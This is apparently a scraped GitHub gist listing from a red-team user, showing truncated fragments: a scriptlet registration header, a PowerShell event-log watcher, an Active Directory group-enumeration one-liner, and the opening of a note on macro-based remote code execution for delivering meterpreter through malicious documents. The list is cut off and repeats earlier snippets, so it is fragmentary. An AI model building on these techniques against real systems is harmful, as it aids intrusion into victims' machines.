Carrie Roberts clr2of8

## test.sct
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

## Watch-EventLogTail.ps1
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
    $event = $eventArgs.EventRecord
    if($event.ProcessId -ne $pid)
    {
        ## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
        ## as the eventing actions run in their own runspace
        # $GLOBAL:lastEvent = $event

## groupenumeration.ps1
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }

## Various-Macro-Based-RCEs.md

      
        
          
            
              
              1 file
            
          
          
            
              
              0 forks
            
          
          
            
              
              0 comments
            
          
          
            
              
              0 stars
            
          
        
        
          
              
          
          
            
                clr2of8
                / Various-Macro-Based-RCEs.md
            
            
              Created
              March 14, 2019 14:59
                — forked from mgeeky/Various-Macro-Based-RCEs.md
            
              
                Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
              
          
        
      
        
  
      
    This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector.
Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:

Page substiution macro for luring user to click Enable Content
The Unicorn Powershell based payload
	<?XML version="1.0"?>
	<scriptlet>

	<registration
	description="Bandit"
	progid="Bandit"
	version="1.00"
	classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>
	## PowerShell Eventing lets you tail an event log:
	## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
	$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
	Register-ObjectEvent $watcher EventRecordWritten -Action {
	$event = $eventArgs.EventRecord
	if($event.ProcessId -ne $pid)
	{
	## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
	## as the eventing actions run in their own runspace
	# $GLOBAL:lastEvent = $event